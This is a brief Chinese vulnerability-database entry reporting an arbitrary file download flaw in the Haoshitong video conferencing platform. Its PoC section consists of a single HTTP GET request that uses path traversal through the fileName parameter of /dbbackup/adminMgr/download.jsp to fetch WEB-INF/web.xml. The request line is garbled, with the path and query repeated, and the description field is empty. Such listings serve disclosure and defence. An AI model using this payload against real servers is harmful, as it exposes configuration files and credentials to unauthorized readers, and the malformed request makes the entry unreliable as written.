好视通视频会议平台 /dbbackup/adminMgr/download.jsp 路径存在任意文件下载

日期: 2024-02-26 | 影响软件: 好视通视频会议平台 | POC: 已公开

漏洞描述

/

PoC代码

GET /dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml HTTP/1.1

相关漏洞推荐